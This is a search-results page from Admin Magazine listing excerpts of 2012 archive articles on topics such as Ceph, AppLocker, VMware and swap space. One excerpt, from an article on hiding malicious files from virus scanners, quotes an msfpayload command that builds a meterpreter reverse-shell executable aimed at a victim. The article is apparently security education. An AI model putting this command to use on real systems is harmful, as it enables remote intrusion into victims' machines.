Admin Magazine
 
  • News
  •  
  • Articles
  •  
  • Tech Tools
  •  
  • Subscribe
  •  
  • Archive
  •  
  • Whitepapers
  •  
  • Digisub
  •  
  • Write for Us!
  •  
  • Newsletter
  •  
  • Shop
  • DevOps
  • Cloud Computing
  • Virtualization
  • HPC
  • Linux
  • Windows
  • Security
  • Monitoring
  • Databases
  • all Topics...
Search
Login
ADMIN Magazine on Facebook
GooglePlus

Search

Refine your search
Sort order
  • Date
  • Score
Content type
  • Article (Print) (397)
  • Article (79)
  • News (43)
  • Blog post (1)
Keywords
Creation time
  • Last day
  • Last week
  • Last month
  • Last three months
  • Last year

« Previous 1 ... 6 7 8 9 10 11 12 13 14 15 16 17 18 19 ... 52 Next »

56%
Hiding a malicious file from virus scanners
30.11.2025
Home »  Archive  »  2012  »  Issue 08: FreeNAS  » 
© Ozphoto, Fotolia.com
the following command: # msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.245.134 LPORT=4444 X /root/Desktop/evi1.exe All that's left now is to deliver the executable to the victim, which requires some ... 2012
56%
The RADOS object store and Ceph filesystem
30.11.2025
Home »  Archive  »  2012  »  Issue 09: Windo...  » 
© Brigida Soriano, Fotolia.com
addr = 10.42.0.101:6789 14 [mon.b] 15 host = bob 16 mon addr = 10.42.0.102:6789 17 [mon.c] 18 host = charlie 19 mon addr = 10.42.0.103:6789 20 [osd.0] 21 host = alice 22 [osd.1] 23 host ... 2012
56%
Using AppLocker to block applications on networks
30.11.2025
Home »  Archive  »  2012  »  Issue 09: Windo...  » 
© Jennifer Huls, 123RF.com
Locker is also available in the Standard, Enterprise, and Datacenter Editions of Windows Server 2008 R2. The approach involves creating policies that are automatically applied to Windows 7 clients. Operating ... AppLocker lets administrators of Windows Server 2008 R2 and Windows 7 use policies to block individual applications. This prevents users from smuggling in undesirable programs on USB sticks ... 2012
56%
News
30.11.2025
Home »  Archive  »  2012  »  Issue 09: Windo...  » 
 
2012
56%
Avoiding common mistakes in high-performance computing
30.11.2025
Home »  Archive  »  2012  »  Issue 09: Windo...  » 
© Maxim Kazmin, 123RF.com
numbers are quoted in terms of speed-up (i.e. 25x speed-up). Unfortunately, no standard baseline exists against which to measure the speed-up, and these results are for single-precision performance (lower ... 2012
56%
Adapting VMware vSphere for state-of-the-art hardware
30.11.2025
Home »  Archive  »  2012  »  Issue 09: Windo...  » 
© victoroancea, 123RF.com
CLI 5.0 [2], which requires at least Windows XP SP2 and .NET as of version 2.0 and Windows PowerShell 2.0. To ensure that you can use all of the PowerCLI features, VMware recommends setting the Power ... 2012
56%
A swap space primer
30.11.2025
Home »  Archive  »  2012  »  Issue 09: Windo...  » 
Size Used Priority 03 /dev/sda5 partition 4085756 52864 -1 The most common configuration is a dedicated swap partition (type 0x82), but you can use swap files hosted in a general ... 2012
56%
Enterprise software management with Red Hat Satellite Server
30.11.2025
Home »  Archive  »  2012  »  Issue 09: Windo...  » 
© robbiverte, 123RF.com
2012
56%
Galera Cluster for MySQL
30.11.2025
Home »  Archive  »  2012  »  Issue 10: Traff...  » 
© Noel Powell, fotolia.com
https://launchpad.net/codership-mysql/5.5/5.5.20-23.4/+download/MySQL-server-5.5.20_wsrep_23.4-1.rhel5.x86_64.rpm wget https://launchpad.net/galera/2.x/23.2.0/+download/galera-23.2.0-1.rhel5.x86_64.rpm ... 2012
56%
Keeping PowerShell in the loop
30.11.2025
Home »  Archive  »  2012  »  Issue 10: Traff...  » 
© Michael Mihin, 123RF.com
patience and light scripting skills. PowerShell versions 1.0 and 2.0 have a somewhat limited ability to grab information from remote systems singly or in bulk. Therefore, you have to work around those ... 2012

« Previous 1 ... 6 7 8 9 10 11 12 13 14 15 16 17 18 19 ... 52 Next »

Service

  • Article Code
  • Contact
  • Legal Notice
  • Privacy Policy
  • Glossary
    • Backup Test
© 2025 Linux New Media USA, LLC – Legal Notice